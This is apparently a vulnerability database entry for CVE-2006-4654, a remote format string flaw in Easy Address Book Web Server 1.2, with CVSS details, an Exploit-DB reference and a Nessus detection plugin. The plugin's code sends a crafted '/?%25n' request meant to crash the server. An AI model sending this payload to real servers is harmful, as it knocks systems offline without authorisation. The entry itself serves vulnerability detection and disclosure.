Vulnerabilities > CVE-2006-4654 - Remote Format String vulnerability in EFS Software Easy Address Book web Server 1.2

047910
CVSS 5.1 - MEDIUM
Attack vector
NETWORK
Attack complexity
HIGH
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
high complexity
efs-software
nessus
exploit available

Summary

Format string vulnerability in Easy Address Book Web Server 1.2 allows remote attackers to cause a denial of service (crash) or "compromise the server" via encoded format string specifiers in the query string.

Vulnerable Configurations

Part Description Count
Application
Efs_Software
1

Exploit-Db

descriptionEasy Address Book Web Server 1.2 Remote Format String Vulnerability. CVE-2006-4654. Remote exploit for windows platform
idEDB-ID:28489
last seen2016-02-03
modified2006-09-04
published2006-09-04
reporterRevnic Vasile
sourcehttps://www.exploit-db.com/download/28489/
titleEasy Address Book Web Server 1.2 - Remote Format String Vulnerability

Nessus

NASL familyCGI abuses
NASL idEABWS_ARG_FORMAT_STRING.NASL
descriptionIt appears that the remote web server is affected by a remote format string issue. Using a specially crafted URL containing a format string specifier, an unauthenticated, remote attacker can crash the affected application and possibly execute arbitrary code on the remote host.
last seen2020-06-01
modified2020-06-02
plugin id22305
published2006-09-05
reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/22305
titleEasy Address Book Web Server Query Remote Format String
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
  script_id(22305);
  script_version("1.21");

  script_cve_id("CVE-2006-4654");
  script_bugtraq_id(19842);

  script_name(english:"Easy Address Book Web Server Query Remote Format String");
  script_summary(english:"Tries to crash Easy Address Book Web Server");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a format string vulnerability." );
 script_set_attribute(attribute:"description", value:
"It appears that the remote web server is affected by a remote format
string issue.  Using a specially crafted URL containing a format
string specifier, an unauthenticated, remote attacker can crash the
affected application and possibly execute arbitrary code on the remote
host." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/445262/30/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/09/05");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/09/05");
 script_cvs_date("Date: 2018/11/15 20:50:16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();


  script_category(ACT_DENIAL);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);


# Make sure it looks like Easy Address Book Web Server.
banner = get_http_banner(port:port);
if (!banner || "Server: Easy Address Book Web Server" >!< banner)
 exit(0, "The web server on port "+port+" is not Easy Address Book Web Server.");

# Try to exploit the flaw to crash the server.
if (http_is_dead(port:port))
 exit(1, "The web server on port "+port+" is dead already.");

r = http_send_recv3(method:"GET",item:"/?%25n", port:port, exit_on_fail: 0);

# There's a problem if the server is now down.
sleep(1);
if (http_is_dead(port:port)) security_warning(port);